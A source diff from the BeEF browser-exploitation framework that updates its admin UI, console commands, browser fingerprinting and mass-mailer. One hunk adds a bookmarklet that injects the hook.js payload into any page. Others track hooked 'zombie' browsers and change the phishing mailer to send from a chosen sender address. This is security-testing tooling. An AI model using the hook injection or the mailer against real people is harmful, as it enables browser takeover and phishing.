||||
# this apparently duplicate code is needed to reply to preflight OPTIONS requests, which need to respond with a 200
|
||||
# and be able to handle requests with a JSON content-type
|
||||
if request.request_method == 'OPTIONS' && config.get("beef.http.restful_api.allow_cors")
|
||||
allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
|
||||
headers "Access-Control-Allow-Origin" => allowed_domains,
|
||||
"Access-Control-Allow-Methods" => "POST, GET",
|
||||
"Access-Control-Allow-Headers" => "Content-Type"
|
||||
halt 200
|
||||
end
|
||||
|
||||
# @note If CORS are enabled, expose the appropriate headers
|
||||
if config.get("beef.http.restful_api.allow_cors")
|
||||
allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
|
||||
headers "Access-Control-Allow-Origin" => allowed_domains,
|
||||
"Access-Control-Allow-Methods" => "POST, GET"
|
||||
end
|
||||
end
|
||||
|
||||
# @note Default root page
|
||||
|
||||
@@ -34,16 +34,18 @@ module BeEF
|
||||
|
||||
def to_h
|
||||
{
|
||||
'beef_version' => VERSION,
|
||||
'beef_url' => @url,
|
||||
'beef_version' => VERSION,
|
||||
'beef_url' => @url,
|
||||
'beef_root_dir' => @root_dir,
|
||||
'beef_host' => @configuration.get('beef.http.host'),
|
||||
'beef_port' => @configuration.get('beef.http.port'),
|
||||
'beef_public' => @configuration.get('beef.http.public'),
|
||||
'beef_host' => @configuration.get('beef.http.host'),
|
||||
'beef_port' => @configuration.get('beef.http.port'),
|
||||
'beef_public' => @configuration.get('beef.http.public'),
|
||||
'beef_public_port' => @configuration.get('beef.http.public_port'),
|
||||
'beef_dns' => @configuration.get('beef.http.dns'),
|
||||
'beef_hook' => @configuration.get('beef.http.hook_file'),
|
||||
'beef_proto' => @configuration.get('beef.http.https.enable') == true ? "https" : "http"
|
||||
'beef_dns_host' => @configuration.get('beef.http.dns_host'),
|
||||
'beef_dns_port' => @configuration.get('beef.http.dns_port'),
|
||||
'beef_hook' => @configuration.get('beef.http.hook_file'),
|
||||
'beef_proto' => @configuration.get('beef.http.https.enable') == true ? "https" : "http",
|
||||
'client_debug' => @configuration.get("beef.client.debug")
|
||||
}
|
||||
end
|
||||
|
||||
|
||||
@@ -86,6 +86,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
|
||||
['Browser Components', 'Windows Media Player','HasWMP'],
|
||||
['Browser Components', 'VLC', 'HasVLC'],
|
||||
['Browser Components', 'Foxit Reader', 'HasFoxit'],
|
||||
['Browser Components', 'WebRTC', 'HasWebRTC'],
|
||||
['Browser Components', 'ActiveX', 'HasActiveX'],
|
||||
['Browser Components', 'Session Cookies', 'hasSessionCookies'],
|
||||
['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],
|
||||
|
||||
@@ -60,6 +60,8 @@
|
||||
<body>
|
||||
<%= nonce_tag %>
|
||||
<div id="header">
|
||||
<div class="left-menu" id="header-right">
|
||||
</div>
|
||||
<div class="right-menu">
|
||||
<img src="/ui/media/images/favicon.ico" alt="BeEF" title="BeEF" />
|
||||
BeEF <%= BeEF::Core::Configuration.instance.get('beef.version') %> |
|
||||
|
||||
@@ -88,6 +88,7 @@ module BeEF
|
||||
has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket')
|
||||
has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears')
|
||||
has_java = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
|
||||
has_webrtc = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebRTC')
|
||||
has_activex = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasActiveX')
|
||||
has_silverlight = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasSilverlight')
|
||||
has_quicktime = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasQuickTime')
|
||||
@@ -113,6 +114,7 @@ module BeEF
|
||||
'has_web_sockets' => has_web_sockets,
|
||||
'has_googlegears' => has_googlegears,
|
||||
'has_java' => has_java,
|
||||
'has_webrtc' => has_webrtc,
|
||||
'has_activex' => has_activex,
|
||||
'has_silverlight' => has_silverlight,
|
||||
'has_quicktime' => has_quicktime,
|
||||
|
||||
@@ -5,13 +5,24 @@
|
||||
*/
|
||||
|
||||
#header .right-menu {
|
||||
width: 300px;
|
||||
float: right;
|
||||
margin: 10px;
|
||||
margin: 3px 3px 0 4px;
|
||||
word-spacing: 5px;
|
||||
font: 11px arial, tahoma, verdana, helvetica;
|
||||
color:#000;
|
||||
}
|
||||
|
||||
#header .left-menu {
|
||||
width: 300px;
|
||||
float: left;
|
||||
margin: 10px 4px 0 20px;
|
||||
word-spacing: 5px;
|
||||
font: 11px arial, tahoma, verdana, helvetica;
|
||||
font-weight: bolder;
|
||||
color:red;
|
||||
}
|
||||
|
||||
#header a:link,
|
||||
#header a:visited {
|
||||
color:#000;
|
||||
|
||||
@@ -42,19 +42,39 @@ Ext.onReady(function() {
|
||||
* This event updater retrieves updates every 8 seconds. Those updates
|
||||
* are then pushed to various managers (i.e. the zombie manager).
|
||||
*/
|
||||
var lastpoll = new Date().getTime();
|
||||
|
||||
Ext.TaskMgr.start({
|
||||
run: function() {
|
||||
Ext.Ajax.request({
|
||||
url: '/ui/panel/hooked-browser-tree-update.json',
|
||||
method: 'POST',
|
||||
success: function(response) {
|
||||
var updates = Ext.util.JSON.decode(response.responseText);
|
||||
var updates;
|
||||
try {
|
||||
updates = Ext.util.JSON.decode(response.responseText);
|
||||
} catch (e) {
|
||||
//The framework has probably been reset and you're actually logged out
|
||||
var hr = document.getElementById("header-right");
|
||||
hr.innerHTML = "You appear to be logged out. <a href='/ui/panel/'>Login</a>";
|
||||
}
|
||||
var distributed_engine_rules = (updates['ditributed-engine-rules']) ? updates['ditributed-engine-rules'] : null;
|
||||
var hooked_browsers = (updates['hooked-browsers']) ? updates['hooked-browsers'] : null;
|
||||
|
||||
if(zombiesManager && hooked_browsers) {
|
||||
zombiesManager.updateZombies(hooked_browsers, distributed_engine_rules);
|
||||
}
|
||||
lastpoll = new Date().getTime();
|
||||
var hr = document.getElementById("header-right");
|
||||
hr.innerHTML = "";
|
||||
},
|
||||
failure: function(response) {
|
||||
var timenow = new Date().getTime();
|
||||
|
||||
if ((timenow - lastpoll) > 60000) {
|
||||
var hr = document.getElementById("header-right");
|
||||
hr.innerHTML = "Framework is down";
|
||||
}
|
||||
}
|
||||
});
|
||||
},
|
||||
|
||||
@@ -6,6 +6,10 @@
|
||||
|
||||
WelcomeTab = function() {
|
||||
|
||||
var hookURL = location.protocol+'%2f%2f'+location.hostname+(location.port ? ':'+location.port : '')+'%2fhook.js';
|
||||
var bookmarklet = "javascript:%20(function%20()%20{%20var%20url%20=%20%27__HOOKURL__%27;if%20(typeof%20beef%20==%20%27undefined%27)%20{%20var%20bf%20=%20document.createElement(%27script%27);%20bf.type%20=%20%27text%2fjavascript%27;%20bf.src%20=%20url;%20document.body.appendChild(bf);}})();"
|
||||
bookmarklet = bookmarklet.replace(/__HOOKURL__/,hookURL);
|
||||
|
||||
welcome = " \
|
||||
<div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' > \
|
||||
<p><img src='/ui/media/images/beef.jpg' alt='BeEF - The Browser Exploitation Framework' /></p><br /> \
|
||||
@@ -13,6 +17,7 @@ WelcomeTab = function() {
|
||||
<p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Getting Started</span></p><br />\
|
||||
<p>Welcome to BeEF!</p><br /> \
|
||||
<p>Before being able to fully explore the framework you will have to 'hook' a browser. To begin with you can point a browser towards the basic demo page <a href='/demos/basic.html' target='_blank'>here</a>, or the advanced version <a href='/demos/butcher/index.html' target='_blank'>here</a>.</p><br /> \
|
||||
<p>If you want to hook ANY page (for debugging reasons of course), drag the following bookmarklet link into your browser's bookmark bar, then simply click the shortcut on another page: <a href='__BOOKMARKLETURL__'>Hook Me!</a></p><br /> \
|
||||
<p>After a browser is hooked into the framework they will appear in the 'Hooked Browsers' panel on the left. Hooked browsers will appear in either an online or offline state, depending on how recently they have polled the framework.</p><br /> \
|
||||
<p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Hooked Browsers</span></p><br />\
|
||||
<p>To interact with a hooked browser simply left-click it, a new tab will appear. \
|
||||
@@ -46,7 +51,9 @@ WelcomeTab = function() {
|
||||
</div>\
|
||||
";
|
||||
|
||||
WelcomeTab.superclass.constructor.call(this, {
|
||||
welcome = welcome.replace(/__BOOKMARKLETURL__/,bookmarklet);
|
||||
|
||||
WelcomeTab.superclass.constructor.call(this, {
|
||||
region:'center',
|
||||
padding:'10 10 10 10',
|
||||
html: welcome,
|
||||
|
||||
@@ -27,10 +27,11 @@ var ZombiesMgr = function(zombies_tree_lists) {
|
||||
var has_web_sockets = zombie_array[index]["has_web_sockets"];
|
||||
var has_googlegears = zombie_array[index]["has_googlegears"];
|
||||
var has_java = zombie_array[index]["has_java"];
|
||||
var has_webrtc = zombie_array[index]["has_webrtc"];
|
||||
var has_activex = zombie_array[index]["has_activex"];
|
||||
var has_wmp = zombie_array[index]["has_wmp"];
|
||||
var has_wmp = zombie_array[index]["has_wmp"];
|
||||
var has_vlc = zombie_array[index]["has_vlc"];
|
||||
var has_foxit = zombie_array[index]["has_foxit"];
|
||||
var has_foxit = zombie_array[index]["has_foxit"];
|
||||
var has_silverlight = zombie_array[index]["has_silverlight"];
|
||||
var has_quicktime = zombie_array[index]["has_quicktime"];
|
||||
var has_realplayer = zombie_array[index]["has_realplayer"];
|
||||
@@ -47,14 +48,15 @@ var ZombiesMgr = function(zombies_tree_lists) {
|
||||
balloon_text+= "<br/>Hardware: " + hw_name;
|
||||
balloon_text+= "<br/>Domain: " + domain + ":" + port;
|
||||
balloon_text+= "<br/>Flash: " + has_flash;
|
||||
balloon_text+= "<br/>Java: " + has_java;
|
||||
balloon_text+= "<br/>Web Sockets: " + has_web_sockets;
|
||||
balloon_text+= "<br/>Java: " + has_java;
|
||||
balloon_text+= "<br/>Web Sockets: " + has_web_sockets;
|
||||
balloon_text+= "<br/>WebRTC: " + has_webrtc;
|
||||
balloon_text+= "<br/>ActiveX: " + has_activex;
|
||||
balloon_text+= "<br/>Silverlight: " + has_silverlight;
|
||||
balloon_text+= "<br/>QuickTime: " + has_quicktime;
|
||||
balloon_text+= "<br/>Windows MediaPlayer: " + has_wmp;
|
||||
balloon_text+= "<br/>VLC: " + has_vlc;
|
||||
balloon_text+= "<br/>Foxit: " + has_foxit;
|
||||
balloon_text+= "<br/>Windows MediaPlayer: " + has_wmp;
|
||||
balloon_text+= "<br/>VLC: " + has_vlc;
|
||||
balloon_text+= "<br/>Foxit: " + has_foxit;
|
||||
balloon_text+= "<br/>RealPlayer: " + has_realplayer;
|
||||
balloon_text+= "<br/>Google Gears: " + has_googlegears;
|
||||
balloon_text+= "<br/>Date: " + date_stamp;
|
||||
@@ -67,7 +69,7 @@ var ZombiesMgr = function(zombies_tree_lists) {
|
||||
'balloon_text' : balloon_text,
|
||||
'check' : false,
|
||||
'domain' : domain,
|
||||
'port' : port
|
||||
'port' : port
|
||||
};
|
||||
|
||||
return new_zombie;
|
||||
|
||||
@@ -249,12 +249,24 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
|
||||
html = String.format("<div style='color:#385F95;text-align:right;'>{0}</div>", value);
|
||||
html += '<p>';
|
||||
for(index in record.data.data) {
|
||||
result = record.data.data[index];
|
||||
result = $jEncoder.encoder.encodeForHTML(record.data.data[index]).replace(/<br>/g,'<br>');
|
||||
index = index.toString().replace('_', ' ');
|
||||
//output escape everything, but allow the <br> tag for better rendering.
|
||||
html += String.format('<b>{0}</b>: {1}<br>', index, $jEncoder.encoder.encodeForHTML(result).replace(/<br>/g,'<br>'));
|
||||
// Check if the data is the image parameter and that it's a base64 encoded png.
|
||||
if (result.substring(0,28) == "image=data:image/png;base64,") {
|
||||
// Lets display the image
|
||||
try {
|
||||
base64_data = window.atob(result.substring(29,result.length));
|
||||
html += String.format('<img src="{0}" /><br>', result.substring(6));
|
||||
} catch(e) {
|
||||
beef.debug("Received invalid base64 encoded image string: "+e.toString());
|
||||
html += String.format('<b>{0}</b>: {1}<br>', index, result);
|
||||
}
|
||||
} else {
|
||||
// output escape everything, but allow the <br> tag for better rendering.
|
||||
html += String.format('<b>{0}</b>: {1}<br>', index, result);
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
html += '</p>';
|
||||
return html;
|
||||
}
|
||||
|
||||
@@ -33,7 +33,7 @@ ZombieTab_IpecTab = function(zombie) {
|
||||
id = data.id;
|
||||
},
|
||||
error: function(){
|
||||
console.log("Error getting module id.");
|
||||
beef.debug("Error getting module id.");
|
||||
}
|
||||
});
|
||||
return id;
|
||||
@@ -110,11 +110,11 @@ ZombieTab_IpecTab = function(zombie) {
|
||||
async: false,
|
||||
processData: false,
|
||||
success: function(data){
|
||||
console.log("data: " + data.command_id);
|
||||
beef.debug("data: " + data.command_id);
|
||||
result = "Command [" + data.command_id + "] sent successfully";
|
||||
},
|
||||
error: function(){
|
||||
console.log("Error sending command");
|
||||
beef.debug("Error sending command");
|
||||
return "Error sending command";
|
||||
}
|
||||
});
|
||||
@@ -142,13 +142,13 @@ ZombieTab_IpecTab = function(zombie) {
|
||||
processData: false,
|
||||
success: function(data){
|
||||
$jwterm.each(data, function(i){
|
||||
console.log("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data);
|
||||
beef.debug("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data);
|
||||
results += $jwterm.parseJSON(data[i].data).data;
|
||||
});
|
||||
|
||||
},
|
||||
error: function(){
|
||||
console.log("Error sending command");
|
||||
beef.debug("Error sending command");
|
||||
return "Error sending command";
|
||||
}
|
||||
});
|
||||
|
||||
@@ -10,9 +10,18 @@ module CommandDispatcher
|
||||
|
||||
class Command
|
||||
include BeEF::Extension::Console::CommandDispatcher
|
||||
|
||||
@@params = []
|
||||
|
||||
def initialize(driver)
|
||||
super
|
||||
begin
|
||||
driver.interface.cmd['Data'].each{|data|
|
||||
@@params << data['name']
|
||||
}
|
||||
rescue
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
def commands
|
||||
@@ -41,12 +50,16 @@ class Command
|
||||
}
|
||||
|
||||
print_line("Module name: " + driver.interface.cmd['Name'])
|
||||
print_line("Module category: " + driver.interface.cmd['Category'])
|
||||
print_line("Module category: " + driver.interface.cmd['Category'].to_s)
|
||||
print_line("Module description: " + driver.interface.cmd['Description'])
|
||||
print_line("Module parameters:") if not driver.interface.cmd['Data'].length == 0
|
||||
|
||||
driver.interface.cmd['Data'].each{|data|
|
||||
print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'])
|
||||
if data['type'].eql?("combobox")
|
||||
print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'] + " (Options include: " + data['store_data'].to_s + ")")
|
||||
else
|
||||
print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'])
|
||||
end
|
||||
} if not driver.interface.cmd['Data'].nil?
|
||||
end
|
||||
|
||||
@@ -80,6 +93,16 @@ class Command
|
||||
print_status("Sets parameters for the current modules. Run \"cmdinfo\" to see the parameter values")
|
||||
print_status(" Usage: param <paramname> <paramvalue>")
|
||||
end
|
||||
|
||||
def cmd_param_tabs(str,words)
|
||||
return if words.length > 1
|
||||
|
||||
if @@params == ""
|
||||
#nothing prepopulated?
|
||||
else
|
||||
return @@params
|
||||
end
|
||||
end
|
||||
|
||||
def cmd_execute(*args)
|
||||
@@bare_opts.parse(args) {|opt, idx, val|
|
||||
@@ -119,6 +142,7 @@ class Command
|
||||
])
|
||||
|
||||
if args[0] == nil
|
||||
lastcmdid = nil
|
||||
driver.interface.getcommandresponses.each do |resp|
|
||||
indiresp = driver.interface.getindividualresponse(resp['object_id'])
|
||||
respout = ""
|
||||
@@ -126,6 +150,7 @@ class Command
|
||||
respout = "No response yet"
|
||||
else
|
||||
respout = Time.at(indiresp[0]['date'].to_i).to_s
|
||||
lastcmdid = resp['object_id']
|
||||
end
|
||||
tbl << [resp['object_id'].to_s, resp['creationdate'], respout]
|
||||
end
|
||||
@@ -133,6 +158,16 @@ class Command
|
||||
puts "\n"
|
||||
puts "List of responses for this command module:\n"
|
||||
puts tbl.to_s + "\n"
|
||||
|
||||
if not lastcmdid.nil?
|
||||
resp = driver.interface.getindividualresponse(lastcmdid)
|
||||
puts "\n"
|
||||
print_line("The last response [" + lastcmdid.to_s + "] was retrieved: " + Time.at(resp[0]['date'].to_i).to_s)
|
||||
print_line("Response:")
|
||||
resp.each do |op|
|
||||
print_line(op['data']['data'].to_s)
|
||||
end
|
||||
end
|
||||
else
|
||||
output = driver.interface.getindividualresponse(args[0])
|
||||
if output.nil?
|
||||
|
||||
@@ -141,13 +141,14 @@ class Core
|
||||
[
|
||||
'Id',
|
||||
'IP',
|
||||
'Hook Host',
|
||||
'Browser',
|
||||
'OS',
|
||||
'Hardware'
|
||||
])
|
||||
|
||||
BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30)).each do |zombie|
|
||||
tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
|
||||
tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session,"HostName").to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName').to_s+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion').to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
|
||||
end
|
||||
|
||||
puts "\n"
|
||||
@@ -174,12 +175,14 @@ class Core
|
||||
[
|
||||
'Id',
|
||||
'IP',
|
||||
'Hook Host',
|
||||
'Browser',
|
||||
'OS'
|
||||
'OS',
|
||||
'Hardware'
|
||||
])
|
||||
|
||||
BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30)).each do |zombie|
|
||||
tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName')]
|
||||
tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session,"HostName").to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName').to_s+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion').to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
|
||||
end
|
||||
|
||||
puts "\n"
|
||||
@@ -283,12 +286,21 @@ class Core
|
||||
offlinezombies << zombie.id
|
||||
end
|
||||
|
||||
if not offlinezombies.include?(args[0].to_i)
|
||||
print_status("Browser does not appear to be offline..")
|
||||
return false
|
||||
end
|
||||
targets = args[0].split(',')
|
||||
targets.each {|t|
|
||||
if not offlinezombies.include?(t.to_i)
|
||||
print_status("Browser [id:"+t.to_s+"] does not appear to be offline.")
|
||||
return false
|
||||
end
|
||||
#print_status("Adding browser [id:"+t.to_s+"] to target list.")
|
||||
}
|
||||
|
||||
# if not offlinezombies.include?(args[0].to_i)
|
||||
# print_status("Browser does not appear to be offline..")
|
||||
# return false
|
||||
# end
|
||||
|
||||
if not driver.interface.setofflinetarget(args[0]).nil?
|
||||
if not driver.interface.setofflinetarget(targets).nil?
|
||||
if (driver.dispatcher_stack.size > 1 and
|
||||
driver.current_dispatcher.name != 'Core')
|
||||
driver.destack_dispatcher
|
||||
@@ -299,7 +311,7 @@ class Core
|
||||
if driver.interface.targetid.length > 1
|
||||
driver.update_prompt("(%bld%redMultiple%clr) ["+driver.interface.targetid.join(",")+"] ")
|
||||
else
|
||||
driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.to_s+"] ")
|
||||
driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.first.to_s+"] ")
|
||||
end
|
||||
end
|
||||
|
||||
@@ -327,7 +339,12 @@ class Core
|
||||
driver.run_single("offline")
|
||||
when 'commands'
|
||||
if driver.dispatched_enstacked(Target)
|
||||
if args[1] == "-s" and not args[2].nil?
|
||||
driver.run_single("commands #{args[1]} #{args[2]}")
|
||||
return
|
||||
else
|
||||
driver.run_single("commands")
|
||||
end
|
||||
else
|
||||
print_error("You aren't targeting a zombie yet")
|
||||
end
|
||||
|
||||
@@ -18,7 +18,7 @@ class Target
|
||||
begin
|
||||
driver.interface.getcommands.each { |folder|
|
||||
folder['children'].each { |command|
|
||||
@@commands << folder['text'] + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
|
||||
@@commands << folder['text'].gsub(/\s/,"_") + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
|
||||
}
|
||||
}
|
||||
rescue
|
||||
@@ -40,17 +40,29 @@ class Target
|
||||
|
||||
@@bare_opts = Rex::Parser::Arguments.new(
|
||||
"-h" => [ false, "Help." ])
|
||||
|
||||
@@commands_opts = Rex::Parser::Arguments.new(
|
||||
"-h" => [ false, "Help."],
|
||||
"-s" => [ false, "<search term>"],
|
||||
"-r" => [ false, "List modules which have responses against them only"])
|
||||
|
||||
def cmd_commands(*args)
|
||||
|
||||
searchstring = nil
|
||||
responly = nil
|
||||
|
||||
@@bare_opts.parse(args) {|opt, idx, val|
|
||||
@@commands_opts.parse(args) {|opt, idx, val|
|
||||
case opt
|
||||
when "-h"
|
||||
cmd_commands_help
|
||||
return false
|
||||
when "-s"
|
||||
searchstring = args[1].downcase if not args[1].nil?
|
||||
when "-r"
|
||||
responly = true
|
||||
end
|
||||
}
|
||||
|
||||
|
||||
tbl = Rex::Ui::Text::Table.new(
|
||||
'Columns' =>
|
||||
[
|
||||
@@ -63,10 +75,29 @@ class Target
|
||||
|
||||
driver.interface.getcommands.each { |folder|
|
||||
folder['children'].each { |command|
|
||||
tbl << [command['id'].to_i,
|
||||
folder['text'] + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_"),
|
||||
|
||||
cmdstring = folder['text'].gsub(/\s/,"_") + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
|
||||
|
||||
if not searchstring.nil?
|
||||
if not cmdstring.downcase.index(searchstring).nil?
|
||||
tbl << [command['id'].to_i,
|
||||
cmdstring,
|
||||
command['status'].gsub(/^Verified /,""),
|
||||
driver.interface.getcommandresponses(command['id']).length] #TODO
|
||||
end
|
||||
elsif not responly.nil?
|
||||
tbl << [command['id'].to_i,
|
||||
cmdstring,
|
||||
command['status'].gsub(/^Verified /,""),
|
||||
driver.interface.getcommandresponses(command['id']).length] if driver.interface.getcommandresponses(command['id']).length.to_i > 0
|
||||
|
||||
else
|
||||
tbl << [command['id'].to_i,
|
||||
cmdstring,
|
||||
command['status'].gsub(/^Verified /,""),
|
||||
driver.interface.getcommandresponses(command['id']).length] #TODO
|
||||
end
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
@@ -78,6 +109,9 @@ class Target
|
||||
|
||||
def cmd_commands_help(*args)
|
||||
print_status("List command modules for this target")
|
||||
print_line("Usage: commands [options]")
|
||||
print_line
|
||||
print @@commands_opts.usage()
|
||||
end
|
||||
|
||||
def cmd_info(*args)
|
||||
@@ -133,7 +167,7 @@ class Target
|
||||
else
|
||||
driver.interface.getcommands.each { |x|
|
||||
x['children'].each { |y|
|
||||
if args[0].chomp == x['text']+"/"+y['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
|
||||
if args[0].chomp == x['text'].gsub(/\s/,"_")+y['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
|
||||
modid = y['id']
|
||||
end
|
||||
}
|
||||
|
||||
@@ -302,6 +302,7 @@ class ShellInterface
|
||||
['Browser Components', 'Windows Media Player','HasWMP'],
|
||||
['Browser Components', 'VLC', 'HasVLC'],
|
||||
['Browser Components', 'Foxit', 'HasFoxit'],
|
||||
['Browser Components', 'WebRTC', 'HasWebRTC'],
|
||||
['Browser Components', 'ActiveX', 'HasActiveX'],
|
||||
['Browser Components', 'Session Cookies', 'hasSessionCookies'],
|
||||
['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],
|
||||
@@ -310,7 +311,7 @@ class ShellInterface
|
||||
['Hooked Page', 'Page Title', 'PageTitle'],
|
||||
['Hooked Page', 'Page URI', 'PageURI'],
|
||||
['Hooked Page', 'Page Referrer', 'PageReferrer'],
|
||||
['Hooked Page', 'Host Name/IP', 'HostName'],
|
||||
['Hooked Page', 'Hook Host', 'HostName'],
|
||||
['Hooked Page', 'Cookies', 'Cookies'],
|
||||
|
||||
# Host
|
||||
@@ -328,22 +329,22 @@ class ShellInterface
|
||||
|
||||
case p[2]
|
||||
when "BrowserName"
|
||||
data = BeEF::Core::Constants::Browsers.friendly_name(BD.get(zombie_session, p[2]))
|
||||
data = BeEF::Core::Constants::Browsers.friendly_name(BD.get(self.targetsession.to_s, p[2])).to_s
|
||||
|
||||
when "ScreenSize"
|
||||
screen_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
|
||||
screen_size_hash = JSON.parse(BD.get(self.targetsession.to_s, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
|
||||
width = screen_size_hash['width']
|
||||
height = screen_size_hash['height']
|
||||
cdepth = screen_size_hash['colordepth']
|
||||
data = "Width: #{width}, Height: #{height}, Colour Depth: #{cdepth}"
|
||||
|
||||
when "WindowSize"
|
||||
window_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
|
||||
window_size_hash = JSON.parse(BD.get(self.targetsession.to_s, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
|
||||
width = window_size_hash['width']
|
||||
height = window_size_hash['height']
|
||||
data = "Width: #{width}, Height: #{height}"
|
||||
else
|
||||
data = BD.get(zombie_session, p[2])
|
||||
data = BD.get(self.targetsession, p[2])
|
||||
end
|
||||
|
||||
# add property to summary hash
|
||||
|
||||
@@ -21,7 +21,7 @@ beef:
|
||||
use_auth: true
|
||||
use_tls: true
|
||||
helo: "gmail.com" # this is usually the domain name
|
||||
from: "youruser@gmail.com"
|
||||
auth: "youruser@gmail.com"
|
||||
password: "yourpass"
|
||||
# available templates
|
||||
templates:
|
||||
|
||||
@@ -20,14 +20,14 @@ module BeEF
|
||||
@host = @config.get("#{@config_prefix}.host")
|
||||
@port = @config.get("#{@config_prefix}.port")
|
||||
@helo = @config.get("#{@config_prefix}.helo")
|
||||
@from = @config.get("#{@config_prefix}.from")
|
||||
@auth = @config.get("#{@config_prefix}.auth")
|
||||
@password = @config.get("#{@config_prefix}.password")
|
||||
end
|
||||
|
||||
# tos_hash is an Hash like:
|
||||
# 'antisnatchor@gmail.com' => 'Michele'
|
||||
# 'ciccio@pasticcio.com' => 'Ciccio'
|
||||
def send_email(template, fromname, subject, link, linktext, tos_hash)
|
||||
def send_email(template, fromname, fromaddr, subject, link, linktext, tos_hash)
|
||||
# create new SSL context and disable CA chain validation
|
||||
if @config.get("#{@config_prefix}.use_tls")
|
||||
@ctx = OpenSSL::SSL::SSLContext.new
|
||||
@@ -37,7 +37,7 @@ module BeEF
|
||||
|
||||
n = tos_hash.size
|
||||
x = 1
|
||||
print_info "Sending #{n} mail(s) from [#{@from}] - name [#{fromname}] using template [#{template}]:"
|
||||
print_info "Sending #{n} mail(s) from [#{fromaddr}] - name [#{fromname}] using template [#{template}]:"
|
||||
print_info "subject: #{subject}"
|
||||
print_info "link: #{link}"
|
||||
print_info "linktext: #{linktext}"
|
||||
@@ -47,19 +47,19 @@ module BeEF
|
||||
smtp.enable_starttls(@ctx) unless @config.get("#{@config_prefix}.use_tls") == false
|
||||
|
||||
if @config.get("#{@config_prefix}.use_auth")
|
||||
smtp.start(@helo, @from, @password, :login) do |smtp|
|
||||
smtp.start(@helo, @auth, @password, :login) do |smtp|
|
||||
tos_hash.each do |to, name|
|
||||
message = compose_email(fromname, to, name, subject, link, linktext, template)
|
||||
smtp.send_message(message, @from, to)
|
||||
message = compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
|
||||
smtp.send_message(message, fromaddr, to)
|
||||
print_info "Mail #{x}/#{n} to [#{to}] sent."
|
||||
x += 1
|
||||
end
|
||||
end
|
||||
else
|
||||
smtp.start(@helo, @from) do |smtp|
|
||||
smtp.start(@helo, @auth) do |smtp|
|
||||
tos_hash.each do |to, name|
|
||||
message = compose_email(fromname, to, name, subject, link, linktext, template)
|
||||
smtp.send_message(message, @from, to)
|
||||
message = compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
|
||||
smtp.send_message(message, fromaddr, to)
|
||||
print_info "Mail #{x}/#{n} to [#{to}] sent."
|
||||
x += 1
|
||||
end
|
||||
@@ -67,33 +67,39 @@ module BeEF
|
||||
end
|
||||
end
|
||||
|
||||
def compose_email(fromname, to, name, subject, link, linktext, template)
|
||||
msg_id = random_string(50)
|
||||
boundary = "------------#{random_string(24)}"
|
||||
rel_boundary = "------------#{random_string(24)}"
|
||||
def compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
|
||||
begin
|
||||
msg_id = random_string(50)
|
||||
boundary = "------------#{random_string(24)}"
|
||||
